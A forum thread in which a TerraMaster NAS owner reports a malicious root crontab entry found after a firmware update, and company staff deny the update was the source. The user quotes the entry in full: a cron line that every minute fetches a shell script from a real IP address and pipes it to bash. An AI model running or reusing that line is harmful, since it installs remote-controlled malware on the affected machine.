MALWARE from TNAS Upgrade?

Permissions, domain/LDAP, power, security, notification and more.
Locked
User avatar
davidroynl
Posts: 4
Joined: 28 Jun 2021, 22:34

MALWARE from TNAS Upgrade?

Post by davidroynl »

Hi All,

I noticed the following as my root crontab:

root@NAS:/var/spool/cron/crontabs# cat root
* * * * * wget -q -O - http://195.3.146.118/tr.sh | bash > /dev/null 2>&1
0 12 * * * ntpdate time-a.nist.gov

The crontab was edited at the same time as my last update of the TNAS firmware/software!!! (The cron file date and time is the same as the OS files and folder structures that were updated - this did not happen "after" the update).

This currently appears to be a piece of "attempted" malware that came from TerraMaster during the upgrade process!!
I am now investigating the system and will have to perform more details analysis to ensure there are no other infections.

Why would TerraMaster not inform registered customers of this infection?

I will be posting this on larger global forums as I complete my own investigation, but please people - take precautions!!!!!!!
User avatar
TMroy
TerraMaster Team
Posts: 2579
Joined: 10 Mar 2020, 14:04
China

Re: MALWARE from TNAS Upgrade?

Post by TMroy »

I am sorry to tell you, obviously, your device is infected by the miner virus. The TerraMaster software update package is unlikely to contain malicious viruses. We have malicious virus protection measures and check methods.It is very likely that your system was infected before the update.

here is an article as a possible solution for your reference: https://www.linkedin.com/pulse/kinsing- ... amul-patel
To contact our team, please send email to following addresses, remember to replace (at) with @:
Support team: support(at)terra-master.com (for technical support only)
Service team: service(at)terra-master.com (for purchasing, return, replacement, RMA service)
User avatar
TMroy
TerraMaster Team
Posts: 2579
Joined: 10 Mar 2020, 14:04
China

Re: MALWARE from TNAS Upgrade?

Post by TMroy »

{L_BUTTON_AT}davidroynl
One important thing I would like to remind you!
I just have confirmation from our tech team, they checked again our recent update packages, no any malware found. You need to stop immediately such nonsense speaking, the malware does not come from TNAS updates.
To contact our team, please send email to following addresses, remember to replace (at) with @:
Support team: support(at)terra-master.com (for technical support only)
Service team: service(at)terra-master.com (for purchasing, return, replacement, RMA service)
User avatar
davidroynl
Posts: 4
Joined: 28 Jun 2021, 22:34

Re: MALWARE from TNAS Upgrade?

Post by davidroynl »

Interesting for sure that the malware made it to a machine that has no internet access. There has been very little information provided to end users on this "trend" of TNAS devices being infected, and so I do absolutely hold the company partially responsible for multiple reasons, the most of which is lack of communication on a known issue, and secondly, no actions taken to help regular users remove and prevent infection.

Only TNAS has an ability to reach all owners of TNAS devices and rectify this. MOST users are not able to look for infection, or figure out how to clean it from an infected device.

Passing the buck and ignoring the problem is not an appropriate response.
User avatar
TMroy
TerraMaster Team
Posts: 2579
Joined: 10 Mar 2020, 14:04
China

Re: MALWARE from TNAS Upgrade?

Post by TMroy »

Well, the miner malware is a kind of virus, it does not matter if your tnas connect with internet or not. it spreads in various ways, it can get into an environment’s network through everyday activities like:

. Exchanging data between devices
. Visiting infected websites (a device can get infected even without downloading files)
. Downloading torrent files or other free software
. Using external storage devices (like USB drives) that were previously connected to an infected computer
. Opening infected email attachments

So I have no idea how you got your TNAS infected, besides of providing you reference article with solution, we can do nothing else for you. I think it is fair enough.
To contact our team, please send email to following addresses, remember to replace (at) with @:
Support team: support(at)terra-master.com (for technical support only)
Service team: service(at)terra-master.com (for purchasing, return, replacement, RMA service)
Locked